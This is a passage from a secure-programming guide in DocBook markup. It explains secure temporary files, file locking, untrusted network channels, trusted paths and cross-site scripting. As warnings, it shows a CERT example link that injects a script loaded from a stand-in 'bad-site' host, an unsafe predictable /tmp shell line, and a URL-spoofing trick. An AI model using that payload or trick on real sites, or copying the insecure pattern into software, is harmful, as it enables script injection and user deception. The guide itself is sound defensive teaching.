(using the C interface) is tmpfile(3).
The tmpfile(3) function creates a temporary file
and opens a corresponding stream, returning that stream (or NULL if it didn't).
Unfortunately, the specification doesn't make any
guarantees that the file will be created securely.
In earlier versions of this book, I stated that I was concerned because
I could not assure myself that all implementations do this securely.
I've since found that older System V systems
have an insecure implementation of tmpfile(3) (as well as insecure
implementations of tmpnam(3) and tempnam(3)), so on at least some systems
it's absolutely useless.
<!-- http://www.gsp.com/cgi-bin/man.cgi?section=3&topic=tmpfile which
  shows tmpfile(3) of BSD, November 17, 1993. -->
Library implementations of tmpfile(3) should securely create such files,
of course, but users don't always realize that their system libraries
have this security flaw, and sometimes they can't do anything about it.
</para>

<para>
Kris Kennaway recommends using mkstemp(3) for making temporary files
in general.
His rationale is that you should use well-known library functions to perform
this task instead of rolling your own functions, and that this function
has well-known semantics.
This is certainly a reasonable position.
I would add that, if you use mkstemp(3), be sure to use umask(2) to limit
the resulting temporary file permissions to only the owner.
This is because
some implementations of mkstemp(3) (basically older ones) make such
files readable and writable by all,
creating a condition in which an attacker can read or
write private data in this directory.
A minor nuisance is that mkstemp(3) doesn't directly support the
environment variables TMP or TMPDIR (as discussed below), so
if you want to support them you have to add code to do so.
Here's a program in C that demonstrates how to use mkstemp(3)
for this purpose, both directly and when adding support for TMP and TMPDIR:

<programlisting width=72>
<![CDATA[
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>

void failure(msg) {
 fprintf(stderr, "%s\n", msg);
 exit(1);
}

/*
 * Given a "pattern" for a temporary filename
 * (starting with the directory location and ending in XXXXXX),
 * create the file and return it.
 * This routines unlinks the file, so normally it won't appear in
 * a directory listing.
 * The pattern will be changed to show the final filename.
 */

FILE *create_tempfile(char *temp_filename_pattern)
{
 int temp_fd;
 mode_t old_mode;
 FILE *temp_file;

 old_mode = umask(077);  /* Create file with restrictive permissions */
 temp_fd = mkstemp(temp_filename_pattern);
 (void) umask(old_mode);
 if (temp_fd == -1) {
   failure("Couldn't open temporary file");
 }
 if (!(temp_file = fdopen(temp_fd, "w+b"))) {
   failure("Couldn't create temporary file's file descriptor");
 }
 if (unlink(temp_filename_pattern) == -1) {
   failure("Couldn't unlink temporary file");
 }
 return temp_file;
}


/*
 * Given a "tag" (a relative filename ending in XXXXXX),
 * create a temporary file using the tag.  The file will be created
 * in the directory specified in the environment variables
 * TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise
 * it will be created in /tmp.  Note that root (and su'd to root)
 * _will_ use TMPDIR or TMP, if defined.
 *
 */
FILE *smart_create_tempfile(char *tag)
{
 char *tmpdir = NULL;
 char *pattern;
 FILE *result;

 if ((getuid()==geteuid()) && (getgid()==getegid())) {
   if (! ((tmpdir=getenv("TMPDIR")))) {
     tmpdir=getenv("TMP");
   }
 }
 if (!tmpdir) {tmpdir = "/tmp";}

 pattern = malloc(strlen(tmpdir)+strlen(tag)+2);
 if (!pattern) {
   failure("Could not malloc tempfile pattern");
 }
 strcpy(pattern, tmpdir);
 strcat(pattern, "/");
 strcat(pattern, tag);
 result = create_tempfile(pattern);
 free(pattern);
 return result;
}


main() {
 int c;
 FILE *demo_temp_file1;
 FILE *demo_temp_file2;
 char demo_temp_filename1[] = "/tmp/demoXXXXXX";
 char demo_temp_filename2[] = "second-demoXXXXXX";

 demo_temp_file1 = create_tempfile(demo_temp_filename1);
 demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);
 fprintf(demo_temp_file2, "This is a test.\n");
 printf("Printing temporary file contents:\n");
 rewind(demo_temp_file2);
 while (  (c=fgetc(demo_temp_file2)) != EOF) {
   putchar(c);
 }
 putchar('\n');
 printf("Exiting; you'll notice that there are no temporary files on exit.\n");
}
]]>
</programlisting>
</para>

<para>
Kennaway states that if you can't use mkstemp(3),
then make yourself a directory using mkdtemp(3), which is protected
from the outside world.
However, as Michal Zalewski notes, this is a bad idea if there are
tmp cleaners in use; instead, use a directory inside the user's HOME.
Finally, if you really have to use the insecure mktemp(3), use lots of
X's - he suggests 10 (if your libc allows it) so that the filename can't
easily be guessed (using only 6 X's means that 5 are taken up by the
PID, leaving only one random character and allowing an attacker to
mount an easy race condition).
Note that this is fundamentally insecure, so you should normally not do this.
I add that you should avoid tmpnam(3) as well -
some of its uses aren't reliable when threads are present, and
it doesn't guarantee that it will work correctly after
TMP_MAX uses (yet most practical uses must be inside a loop).
</para>

<para>
In general, you should avoid using the insecure functions
such as mktemp(3) or tmpnam(3), unless you take specific measures to
counter their insecurities or test for a secure library implementation
as part of your installation routines.
If you ever want to make a file in /tmp or a world-writable directory
(or group-writable, if you don't trust the group) and don't want to
use mk*temp() (e.g. you intend for the file to be predictably named),
then <emphasis>always</emphasis> use the O_CREAT and O_EXCL flags to
open() and <emphasis>check the return value</emphasis>.
If you fail the open() call, then recover gracefully (e.g. exit).
<!-- Kennaway mentioned O_EXCL, but forgot O_CREAT -->
</para>

<para>
The GNOME programming guidelines recommend the following C code when
creating filesystem objects in shared (temporary) directories
to securely open temporary files [Quintero 2000]:
<programlisting width="68">
 char *filename;
 int fd;

 do {
   filename = tempnam (NULL, "foo");
   fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
   free (filename);
 } while (fd == -1);
</programlisting>
Note that, although the insecure function tempnam(3) is being used, it
is wrapped inside a loop using O_CREAT and O_EXCL to counteract its
security weaknesses, so this use is okay.
Note that you need to free() the filename.
You should close() and unlink() the file after you are done.
If you want to use the Standard C I/O library,
you can use fdopen() with mode "w+b"
to transform the file descriptor into a FILE *.
Note that this approach won't work over
NFS version 2 (v2) systems, because older
NFS doesn't correctly support O_EXCL.
Note that one minor disadvantage to this approach is that, since
tempnam can be used insecurely, various compilers and security scanners
may give you spurious warnings about its use.
This isn't a problem with mkstemp(3).
<!-- They also say you can use tmpfile() to do it in one step; I want
     to verify this before saying so. I'm concerned that some
     implementations may not "do it correctly", and it's better to
     re-implement than be insecure. -->
<!-- http://developer.gnome.org/doc/guides/programming-guidelines/security.html -->
</para>

<para>
If you need a temporary file in a shell script, you're probably
best off using pipes, using a local directory (e.g., something inside the
user's home directory), or in some cases using the current directory.
That way, there's no sharing unless the user permits it.
If you really want/need the temporary file
to be in a shared directory like /tmp, do
<emphasis>not</emphasis> use the traditional shell
technique of using the process id in a template and just creating the file
using normal operations like ">".
Shell scripts can use "$$" to indicate the PID, but the
PID can be easily determined or guessed by an attacker,
who can then pre-create files or links with the same name.
Thus the following "typical" shell script is <emphasis>unsafe</emphasis>:
<programlisting width="72">
<![CDATA[
   echo "This is a test" > /tmp/test$$  # DON'T DO THIS.
]]>
</programlisting>
</para>


<para>
If you need a temporary file or directory
in a shell script, and you want it in /tmp,
a solution sometimes suggested is to use
mktemp(1), which is intended for use in shell scripts
(note that mktemp(1) and mktemp(3) are different things).
However, as Michal Zalewski notes, this is insecure in many environments
that run tmp cleaners;
the problem is that when a privileged program sweeps through a temporary
directory, it will probably expose a race condition.
Even if this weren't true, I do not recommend using shell scripts that
create temporary files in shared directories;
creating such files in private directories or using pipes instead is
generally preferable, even if you're sure your tmpwatch program is okay
(or that you have no local users).
If you must use mktemp(1), note that
mktemp(1) takes a template, then
creates a file or directory using O_EXCL and returns the resulting name;
thus, mktemp(1) won't work on NFS version 2 filesystems.
Here are some examples of correct use of mktemp(1) in Bourne shell scripts;
these examples are straight from the mktemp(1) man page:
<programlisting width="72">
<![CDATA[
 # Simple use of mktemp(1), where the script should quit
 # if it can't get a safe temporary file.
 # Note that this will be INSECURE on many systems, since they use
 # tmpwatch-like programs that will erase "old" files and expose race
 # conditions.

   TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
   echo "program output" >> $TMPFILE

  # Simple example, if you want to catch the error:

   TMPFILE=`mktemp -q /tmp/$0.XXXXXX`
   if [ $? -ne 0 ]; then
      echo "$0: Can't create temp file, exiting..."
      exit 1
   fi
]]>
</programlisting>
</para>

<para>
Perl programmers should use File::Temp, which tries to
provide a cross-platform means of securely creating temporary files.
However, read the documentation carefully on how to use it properly first;
it includes interfaces to unsafe functions as well.
I suggest explicitly setting its safe_level to HIGH; this will invoke
additional security checks.
<ulink url="http://search.cpan.org/author/JHI/perl-5.8.0/lib/File/Temp.pm">
The Perl 5.8 documentation of File::Temp is available on-line</ulink>.
</para>

<para>
Don't reuse a temporary filename (i.e. remove and recreate it),
no matter how you obtained the ``secure'' temporary filename in the
first place.
An attacker can observe the original filename
and hijack it before you recreate it the second time.
And of course, always use appropriate file permissions.
For example, only allow world/group access
if you need the world or a group to access the file, otherwise
keep it mode 0600 (i.e., only the owner can read or write it).
</para>

<para>
Clean up after yourself, either by using an exit handler, or making
use of UNIX filesystem semantics and unlink()ing the file immediately
after creation so the directory entry goes away but the file itself
remains accessible until the last file descriptor pointing to it is
closed. You can then continue to access it within your program by
passing around the file descriptor.
Unlinking the file has a lot of advantages for code maintenance:
the file is automatically deleted, no matter how your program crashes.
It also decreases the likelihood that a maintainer will insecurely
use the filename (they need to use the file descriptor instead).
The one minor problem with immediate unlinking is that it makes it slightly
harder for administrators to see how disk space is being used, since
they can't simply look at the file system by name.
</para>

<para>
You might consider ensuring that your code for Unix-like systems
respects the environment variables TMP or TMPDIR
if the provider of these variable values is trusted.
By doing so, you make it possible for users to move their temporary
files into an unshared directory (and eliminating the problems discussed here),
such as a subdirectory inside their home directory.
Recent versions of Bastille can set these variables to reduce the sharing
between users.
Unfortunately, many users set TMP or TMPDIR to a shared directory
(say /tmp), so your secure program must still
correctly create temporary files even if these environment variables
are set.
This is one advantage of the GNOME approach, since at least on some
systems tempnam(3) automatically uses TMPDIR, while
the mkstemp(3) approach requires more code to do this.
Please don't create yet more environment variables for temporary directories
(such as TEMP), and in particular don't create a different environment
name for each application (e.g., don't use "MYAPP_TEMP").
Doing so greatly complicates managing systems,
and users wanting a special temporary directory for a specific
application can just set the environment variable specially
when running that particular application.
Of course, if these environment variables might have been set by an
untrusted source, you should ignore them - which you'll do anyway
if you follow the advice in
<xref linkend="env-var-solution">.
</para>

<para>
These techniques don't work if the temporary directory is remotely
mounted using NFS version 2 (NFSv2), because NFSv2 doesn't properly
support O_EXCL.
See <xref linkend="locking-using-files"> for more information.
NFS version 3 and later properly support O_EXCL; the simple solution
is to ensure that temporary directories are either local or, if mounted
using NFS, mounted using NFS version 3 or later.
There is a technique for safely creating temporary files on NFS v2,
involving the use of link(2) and stat(2), but it's complex; see
<xref linkend="locking-using-files"> which has more information about this.
</para>

<para>
As an aside, it's worth noting that
FreeBSD has recently changed the mk*temp() family to get rid of
the PID component of the filename and replace the entire thing with
base-62 encoded randomness. This drastically raises the number of
possible temporary files for the "default" usage of 6 X's, meaning
that even mktemp(3) with 6 X's is reasonably (probabilistically) secure
against guessing, except under very frequent usage.
However, if you also follow the guidance here, you'll eliminate the
problem they're addressing.
</para>

<para>
Much of this information on temporary files was derived from
<ulink url="http://lwn.net/2000/1221/a/sec-tmp.php3">Kris Kennaway's
posting to Bugtraq about temporary files on December 15, 2000</ulink>.
</para>

<para>
I should note that the Openwall Linux patch from
<ulink url="http://www.openwall.com/linux/">http://www.openwall.com/linux/</ulink>
includes an optional ``temporary file directory'' policy that counters
many temporary file based attacks.
The Linux Security Module (LSM) project includes an "owlsm" module
that implements some of the OpenWall ideas, so
Linux Kernels with LSM can quickly insert these rules into a running system.
When enabled, it has two protections:
<itemizedlist>
<listitem>
<para>
Hard links: Processes may not make hard links to files in certain cases.
The OpenWall documentation states that
"Processes may not make hard links to files they do not have write access to."
In the LSM version, the rules are as follows:
if both the process' uid and fsuid (usually the same as the euid) is
is different from the linked-to-file's uid, the
process uid is not root, and the process lacks the FOWNER capability, then
the hard link is forbidden.
The check against the process uid may be dropped someday
(they are work-arounds for the atd(8) program), at which point the rules
would be:
if both the process' fsuid (usually the same as the euid) is
is different from the linked-to-file's uid and
and the process lacks the FOWNER capability, then the hard link is forbidden.
In other words, you can only create hard links to files you own,
unless you have the FOWNER capability.

<!-- do_owlsm_link -->
</para>
</listitem>
<listitem>
<para>
Symbolic links (symlinks): Certain symlinks are not followed.
The original OpenWall documentation states that
"root processes may not follow symlinks that
are not owned by root", but the actual rules (from looking at the code)
are more complicated.
In the LSM version, if the directory is sticky ("+t" mode, used in shared
directories like /tmp), symlinks are not followed if the symlink was
created by anyone other than either the owner of the directory or
the current process' fsuid (which is usually the effective uid).
<!-- see do_owlsm_follow_link -->
</para>
</listitem>
</itemizedlist>
Many systems do not implement this openwall policy, so you can't depend on
this in general protecting your system.
However, I encourage using this policy on your own system, and
please make sure that your application will work when this policy is in place.
</para>

<!-- ???: I need to completely rewrite this race condition section -->

<!-- Not quite the right idea:
You can't even just check to see if the given file is a symbolic link;
if it's owned by an untrusted user, the user could change this after
the check.
One possible tool is the O_NOFOLLOW option for open(), a
FreeBSD extension also supported by Linux; this option says to not
follow symbolic links if the link the final portion of the path.
Unfortunately at this time this option is not portable.
-->

</sect3>


</sect2>


<sect2 id="locking">
<title>Locking</title>

<para>
There are often situations in which a program must ensure that it has
exclusive rights to something (e.g., a file, a device, and/or
existence of a particular server process).
Any system which locks resources must deal with the standard problems
of locks, namely, deadlocks (``deadly embraces''), livelocks,
and releasing ``stuck'' locks if a program doesn't clean up its locks.
A deadlock can occur if programs are stuck waiting for each other to
release resources.
For example, a deadlock would occur if
process 1 locks resources A and waits for resource B,
while process 2 locks resource B and waits for resource A.
Many deadlocks can be prevented by simply requiring all processes
that lock multiple resources to lock them
in the same order (e.g., alphabetically by lock name).
</para>

<sect3 id="locking-using-files">
<title>Using Files as Locks</title>

<para>
On Unix-like systems resource locking has traditionally been done by creating
a file to indicate a lock, because this is very portable.
It also makes it easy to ``fix'' stuck locks, because an administrator
can just look at the filesystem to see what locks have been set.
Stuck locks can occur because the program failed to clean up after
itself (e.g., it crashed or malfunctioned) or because the whole system crashed.
Note that these are ``advisory'' (not ``mandatory'') locks - all processes
needed the resource must cooperate to use these locks.
<!-- ??? Discuss various approaches to resolve this, e.g.,
There are some standard tricks to simplify clean-up for these
conditions.
For example, a parent process can set a lock,
call a child to do the work (make sure only the parent can call the child
in a way that it can work), and when the child returns the parent releases
the lock.
Or, a cron job can look at the locks (which contain a process id); if
the process isn't alive, it would erase the lock and restart the process.
Finally, the lock file can be erased as part of system start-up.
-->
</para>

<para>
However, there are several traps to avoid.
First, don't use the technique used by
very old Unix C programs,
which is calling creat() or its open() equivalent, the open() mode
O_WRONLY | O_CREAT | O_TRUNC, with the file mode set to 0 (no permissions).
For normal users on normal file systems, this works, but
this approach fails to lock the file when the user has root privileges.
Root can always perform this operation, even when the file
already exists.
In fact, old versions of Unix had this particular problem in the
old editor ``ed'' -- the symptom was that
occasionally portions of the password file would be placed in user's files
[Rochkind 1985, 22]!
Instead, if you're creating a lock for processes that are on the local
filesystem, you should use open() with the flags
O_WRONLY | O_CREAT | O_EXCL (and again, no permissions, so that other
processes with the same owner won't get the lock).
Note the use of O_EXCL, which is the official way to
create ``exclusive'' files; this even works for root on a local filesystem.
[Rochkind 1985, 27].
</para>

<para>
Second, if the lock file may be on an NFS-mounted filesystem, then you have
the problem that NFS version 2 doesn't completely support normal file semantics.
This can even be a problem for work that's supposed to be ``local'' to a
client, since some clients don't have local disks and may have <emphasis remap="it">all</emphasis>
files remotely mounted via NFS.
The manual for <emphasis remap="it">open(2)</emphasis> explains how to handle things in this case
(which also handles the case of root programs):
</para>

<para>
<QUOTE>... programs which rely on
[the O&lowbar;CREAT and O&lowbar;EXCL flags of open(2) to work on
filesystems accessed via NFS version 2]
for performing locking tasks will contain a race condition. The solution
for performing atomic file locking using a lockfile is to create
a unique file on the same filesystem (e.g., incorporating
hostname and pid), use link(2) to make a link to
the lockfile and use stat(2) on the unique file to
check if its link count has increased to 2. Do
not use the return value of the link(2) call.</QUOTE>
</para>

<para>
Obviously, this solution only works if all programs doing the locking
are cooperating, and if all non-cooperating programs aren't allowed to
interfere.
In particular, the directories you're using for file locking
must not have permissive file permissions for creating and removing files.
</para>

<para>
NFS version 3 added support for O_EXCL mode in open(2);
see IETF RFC 1813,
in particular the "EXCLUSIVE" value to the "mode" argument of "CREATE".
Sadly, not everyone has switched to NFS version 3 or higher at the time of this
writing, so you can't depend on this yet in portable programs.
Still, in the long run there's hope that this issue will go away.
</para>

<para>
If you're locking a device or the existence of a process on a local
machine, try to use standard conventions.
I recommend using the Filesystem Hierarchy Standard (FHS);
it is widely referenced by Linux systems, but it also tries to incorporate
the ideas of other Unix-like systems.
The FHS describes
standard conventions for such locking files, including naming, placement,
and standard contents of these files [FHS 1997].
If you just want to be sure that your server doesn't execute more than once
on a given machine, you should usually create a process identifier as
/var/run/NAME.pid with the pid as its contents.
In a similar vein, you should place lock files for things
like device lock files in /var/lock.
This approach has the minor disadvantage of leaving files hanging around
if the program suddenly halts,
but it's standard practice and that problem is
easily handled by other system tools.
</para>

<para>
It's important that the programs which are cooperating using files to
represent the locks use the same
directory, not just the same directory name.
This is an issue with networked systems: the FHS explicitly notes that
/var/run and /var/lock are unshareable, while /var/mail is shareable.
Thus, if you want the lock to work on a single machine, but not interfere
with other machines, use unshareable directories like /var/run
(e.g., you want to permit each machine to run its own server).
However, if you want all machines sharing files in a network to obey the
lock, you need to use a directory that they're sharing; /var/mail is
one such location.  See FHS section 2 for more information on this subject.
</para>

</sect3>

<sect3 id="other-locking">
<title>Other Approaches to Locking</title>

<para>
Of course, you need not use files to represent locks.
Network servers often need not bother; the mere act of binding to a port
acts as a kind of lock, since if there's an existing server bound to a given
port, no other server will be able to bind to that port.
</para>

<para>
Another approach to locking
is to use POSIX record locks, implemented through fcntl(2) as a
``discretionary lock''.
These are discretionary, that is, using them requires the cooperation of the
programs needing the locks (just as the approach to using files to
represent locks does).
There's a lot to recommend POSIX record locks:
POSIX record locking is supported on nearly all Unix-like platforms
(it's mandated by POSIX.1), it
can lock portions of a file (not just a whole file), and it can handle the
difference between read locks and write locks.
Even more usefully, if a process dies, its locks are automatically removed,
which is usually what is desired.
<!-- ???:  What about locking across NFS, flock, lockf?
XBoing doc file "problems.txt" says that lockf() works over NFS when
lockd daemon is running. -->
</para>

<para>
You can also use mandatory locks, which are based on System V's
mandatory locking scheme.
These only apply to files where the locked file's setgid bit is set, but
the group execute bit is not set.
Also, you must mount the filesystem to permit mandatory file locks.
In this case, every read(2) and write(2) is checked for locking;
while this is more thorough than advisory locks, it's also slower.
Also, mandatory locks don't port as widely to other Unix-like systems
(they're available on Linux and System V-based systems, but not necessarily
on others).
Note that processes with root privileges
can be held up by a mandatory lock, too, making it possible that
this could be the basis of a denial-of-service attack.
</para>

</sect3>

</sect2>

</sect1>

<sect1 id="trustworthy-channels">
<title>Trust Only Trustworthy Channels</title>

<para>
In general, only trust information (input or results)
from trustworthy channels.
For example,
the routines getlogin(3) and ttyname(3) return information that can be
controlled by a local user, so don't trust them for security purposes.
</para>

<para>
In most computer networks (and certainly for the Internet at large),
no unauthenticated transmission is trustworthy.
For example,
packets sent over the public Internet can be viewed and modified at any
point along their path, and arbitrary new packets can be forged.
These forged packets might include forged information about the sender
(such as their machine (IP) address and port) or receiver.
Therefore, don't use these values as your primary criteria for
security decisions unless you can authenticate them (say using cryptography).
</para>

<para>
This means that, except under special circumstances,
two old techniques for authenticating users
in TCP/IP should often not be used as the sole authentication mechanism.
One technique is to limit users to ``certain machines'' by checking
the ``from'' machine address in a data packet; the other is to
limit access by requiring that the sender use a ``trusted'' port number
(a number less that 1024).
The problem is that in many environments an attacker can forge these values.
</para>

<para>
In some environments, checking these values (e.g., the sending machine
IP address and/or port) can have some value, so
it's not a bad idea to support such checking as an option in a program.
For example, if a system runs behind a firewall, the firewall can't
be breached or circumvented, and the firewall stops
external packets that claim to be from the inside,
then you can claim that any packet saying it's from the inside really does.
Note that you can't be sure the packet actually comes from the machine
it claims it comes from - so you're only countering external threats,
not internal threats.
However, broken firewalls, alternative paths, and mobile code make
even these assumptions suspect.
</para>

<para>
The problem is supporting untrustworthy information as the only way
to authenticate someone.
If you need a trustworthy channel over an untrusted network,
in general you need some sort of cryptologic
service (at the very least, a cryptologically safe hash).
See <xref linkend="crypto">
for more information on cryptographic algorithms and protocols.
If you're implementing a standard and inherently insecure protocol
(e.g., ftp and rlogin), provide safe defaults and document
the assumptions clearly.
</para>


<para>
The Domain Name Server (DNS) is widely used on the Internet to maintain
mappings between the names of computers and their IP (numeric) addresses.
The technique called ``reverse DNS'' eliminates some simple
spoofing attacks, and is useful for determining a host's name.
However, this technique is not trustworthy for authentication decisions.
The problem is that, in the end, a DNS request will be sent eventually
to some remote system that may be controlled by an attacker.
Therefore, treat DNS results as an input that needs
validation and don't trust it for serious access control.
</para>

<para>
Arbitrary email (including the ``from'' value of addresses)
can be forged as well.
Using digital signatures is a method to thwart many such attacks.
A more easily thwarted approach is to require emailing back and forth
with special randomly-created values, but for low-value transactions
such as signing onto a public mailing list this is usually acceptable.
</para>

<para>
Note that in any client/server model, including CGI, that the server
must assume that the client (or someone interposing between the
client and server) can modify any value.
For example, so-called ``hidden fields'' and cookie values can be
changed by the client before being received by CGI programs.
These cannot be trusted unless special precautions are taken.
For example, the hidden fields could be signed in a way the client
cannot forge as long as the server checks the signature.
The hidden fields could also be encrypted using a key only the trusted
server could decrypt (this latter approach is the basic idea behind the
Kerberos authentication system).
InfoSec labs has further discussion about hidden fields and applying
encryption at
<ulink url="http://www.infoseclabs.com/mschff/mschff.htm">http://www.infoseclabs.com/mschff/mschff.htm</ulink>.
In general, you're better off keeping data you care about at the server end
in a client/server model.
In the same vein,
don't depend on HTTP_REFERER for authentication in a CGI program, because
this is sent by the user's browser (not the web server).
</para>

<para>
This issue applies to data referencing other data, too.
For example, HTML or XML allow you to include by reference other files
(e.g., DTDs and style sheets) that may be stored remotely.
However, those external references could be modified so that users
see a very different document than intended;
a style sheet could be modified to ``white out'' words at critical
locations, deface its appearance, or insert new text.
External DTDs could be modified to prevent use of the document
(by adding declarations that break validation) or insert different
text into documents [St. Laurent 2000].
</para>

</sect1>

<sect1 id="trusted-path">
<title>Set up a Trusted Path</title>
<para>
The counterpart to needing trustworthy channels
(see <xref linkend="trustworthy-channels">)
is assuring users that they
really are working with the program or system they intended to use.
</para>

<para>
The traditional example is a ``fake login'' program.
If a program is written to look like the login screen of a system, then
it can be left running.
When users try to log in, the fake login program can then capture user
passwords for later use.
</para>

<para>
A solution to this problem is a ``trusted path.''
A trusted path is simply some mechanism that provides confidence that the
user is communicating with what the user intended to communicate with,
ensuring that attackers can't intercept or modify whatever information
is being communicated.
<!-- A gross simplification of the CC. See:
  http://www.commoncriteria.org/cc/part2/part2anftp.html -->
</para>

<para>
If you're asking for a password, try to set up trusted path.
Unfortunately, stock Linux distributions and many other Unixes don't
have a trusted path even for their normal login sequence.
One approach is to
require pressing an unforgeable key before login, e.g.,
Windows NT/2000 uses ``control-alt-delete'' before logging in; since
normal programs in Windows can't intercept this key pattern, this
approach creates a trusted path.
There's a Linux equivalent, termed the
<ulink url="http://lwn.net/2001/0322/a/SAK.php3">Secure Attention Key
(SAK)</ulink>; it's recommended that this be mapped to
``control-alt-pause''.
Unfortunately, at the time of this writing SAK is immature and not
well-supported by Linux distributions.
Another approach for implementing a trusted path
locally is to control a separate display that only the login
program can perform.
For example, if only trusted programs could modify the keyboard lights
(the LEDs showing Num Lock, Caps Lock, and Scroll Lock),
then a login program could display a running pattern to indicate that
it's the real login program.
Unfortunately, since in current Linux normal users can change the LEDs,
the LEDs can't currently be used to confirm a trusted path.
</para>

<para>
Sadly, the problem is much worse for network applications.
Although setting up a trusted path is desirable for network applications,
completely doing so is quite difficult.
When sending a password over a network, at the very least
encrypt the password between trusted endpoints.
This will at least prevent eavesdropping of passwords by those not
connected to the system, and at least make attacks harder to perform.
If you're concerned about trusted path for the actual communication, make
sure that the communication is
encrypted and authenticated (or at least authenticated).
</para>

<para>
It turns out that this isn't enough to have a trusted path
to networked applications, in particular for web-based applications.
There are documented methods for fooling users of web browsers into thinking
that they're at one place when they are really at another.
For example, Felten [1997] discusses ``web spoofing'',
where users believe they're viewing one web page when in fact all the
web pages they view go through an attacker's site (who can then monitor
all traffic and modify any data sent in either direction).
This is accomplished by rewriting URL.
The rewritten URLs can be made nearly invisible
by using other technology (such as Javascript) to hide any possible
evidence in the status line, location line, and so on.
See their paper for more details.
Another technique for hiding such URLs is exploiting rarely-used URL
syntax, for example, the URL
``http://www.ibm.com/stuff@mysite.com''
is actually a request to view ``mysite.com'' (a potentially malevolent site)
using the unusual username ``www.ibm.com/stuff'.
If the URL is long enough,
the real material won't be displayed and users are unlikely to
notice the exploit anyway.
Yet another approach is to create sites with names deliberately similar
to the ``real'' site - users may not know the difference.
In all of these cases, simply encrypting the line doesn't help -
the attacker can be quite content in encrypting data while completely
controlling what's shown.
</para>

<para>
Countering these problems is more difficult;
at this time I have no good technical solution for fully preventing
``fooled'' web users.
I would encourage web browser developers to counter such ``fooling'',
making it easier to spot.
If it's critical that your users correctly connect to the correct site,
have them use simple procedures to counter the threat.
Examples include having them halt and restart their browser, and making sure
that the web address is very simple and not normally misspelled
(so misspelling it is unlikely).
You might also want to gain ownership of some ``similar'' sounding DNS names,
and search for other such DNS names and material to find attackers.
</para>

</sect1>


<sect1 id="internal-check">
<title>Use Internal Consistency-Checking Code</title>

<para>
The program should check to ensure that its call arguments and basic state
assumptions are valid.
In C, macros such as assert(3) may be helpful in doing so.
<!-- ??? See programming by contract, championed in Eiffel,
     and info on formal proofs. -->
</para>

</sect1>

<sect1 id="self-limit-resources">
<title>Self-limit Resources</title>

<para>
In network daemons, shed or limit excessive loads.
Set limit values (using setrlimit(2)) to limit the resources that will be used.
At the least, use setrlimit(2) to disable creation of ``core'' files.
For example, by default
Linux will create a core file that saves all program memory if the
program fails abnormally, but such a file might include passwords or
other sensitive data.
</para>

</sect1>

<sect1 id="cross-site-malicious-content">
<title>Prevent Cross-Site (XSS) Malicious Content</title>
<para>
Some secure programs accept data from one untrusted user (the attacker)
and pass that data on to a different user's application (the victim).
If the secure program doesn't protect the victim, the
victim's application (e.g., their web browser)
may then process that data in a way harmful to the victim.
This is a particularly common problem for web applications using HTML or XML,
where the problem goes by several names including ``cross-site scripting'',
``malicious HTML tags'', and ``malicious content.''
This book will call this problem ``cross-site malicious content,''
since the problem isn't limited to scripts or HTML, and its cross-site nature
is fundamental.
Note that this problem isn't limited to web applications, but since
this is a particular problem for them, the rest of this discussion
will emphasize web applications.
As will be shown in a moment, sometimes an attacker can cause a victim
to send data from the victim to the secure program, so the secure program
must protect the victim from himself.
</para>

<sect2 id="explain-cross-site">
<title>Explanation of the Problem</title>

<para>
Let's begin with a simple example.
Some web applications are designed to
permit HTML tags in data input from users that will later
be posted to other readers (e.g., in a guestbook or ``reader comment'' area).
If nothing is done to prevent it,
these tags can be used by malicious users to attack other users by inserting
scripts,
Java references (including references to hostile applets), DHTML tags,
early document endings (via &lt;/HTML&gt;), absurd font size requests,
and so on.
This capability can be exploited for a wide range of effects,
such as exposing SSL-encrypted connections, accessing restricted web
sites via the client, violating domain-based security policies,
making the web page unreadable,
making the web page unpleasant to use (e.g., via annoying banners
and offensive material),
permit privacy intrusions (e.g., by inserting a web bug to learn exactly
who reads a certain page),
creating
denial-of-service attacks (e.g., by creating an ``infinite'' number
of windows), and even very destructive attacks (by inserting
attacks on security vulnerabilities such as scripting languages or
buffer overflows in browsers).
By embedding malicious FORM tags at the right place, an intruder
may even be able to trick users into revealing sensitive information
(by modifying the behavior of an existing form).
Or, by embedding scripts, an intruder can cause no end of problems.
This is by no means an exhaustive list of problems, but
hopefully this is enough to convince you that this is a serious problem.
</para>

<para>
Most ``discussion boards'' have already discovered this problem,
and most already take steps to prevent it in text intended to be part of
a multiperson discussion.
Unfortunately, many web application developers don't
realize that this is a much more general problem.
<emphasis>Every</emphasis> data value that is sent from one
user to another can potentially be a source for cross-site
malicious posting, even if it's not an ``obvious'' case of an area
where arbitrary HTML is expected.
The malicious data can even be supplied by the user himself, since the
user may have been fooled into supplying the data via another site.
Here's an example (from CERT) of an HTML link that causes the user to
send malicious data to another site:
<programlisting>
 &lt;A HREF="http://example.com/comment.cgi?mycomment=&lt;SCRIPT
 SRC='http://bad-site/badfile'&gt;&lt;/SCRIPT&gt;"&gt; Click here&lt;/A&gt;
</programlisting>
</para>

<para>
In short, a web application cannot accept input (including any form data)
without checking, filtering, or encoding it.
You can't even pass that data back to the same user in many cases
in web applications, since another user may have surreptitiously
supplied the data.
Even if permitting such material won't hurt your system, it will
enable your system to be a conduit of attacks to your users.
Even worse, those attacks will appear to be coming from your system.
</para>

<para>
CERT describes the problem this way in their advisory:
<blockquote><para>
A web site may inadvertently include malicious HTML tags or script
in a dynamically generated page based on unvalidated input
from untrustworthy sources
(<ulink url="http://www.cert.org/advisories/CA-2000-02.html">CERT Advisory
CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests</ulink>).
</para></blockquote>
More information from CERT about this is available at
<ulink url="http://www.cert.org/archive/pdf/cross_site_scripting.pdf">
http://www.cert.org/archive/pdf/cross_site_scripting.pdf</ulink>.
</para>
</sect2>

<sect2 id="solutions-cross-site">
<title>Solutions to Cross-Site Malicious Content</title>
<para>
Fundamentally, this means that all web application output impacted
by any user must be
filtered (so characters that can cause this problem are removed),
encoded (so the characters that can cause this problem are encoded in
a way to prevent the problem), or
validated (to ensure that only ``safe'' data gets through).
This includes all output derived from
input such as URL parameters, form data, cookies,
database queries, CORBA ORB results, and data from users stored in files.
In many cases,
filtering and validation should be done at the input, but
encoding can be done during either input validation or output generation.
If you're just passing the data through without analysis, it's probably
better to encode the data on input (so it won't be forgotten).
However, if your program processes the data,
it can be easier to encode it on output instead.
CERT recommends that filtering and encoding be done during data output;
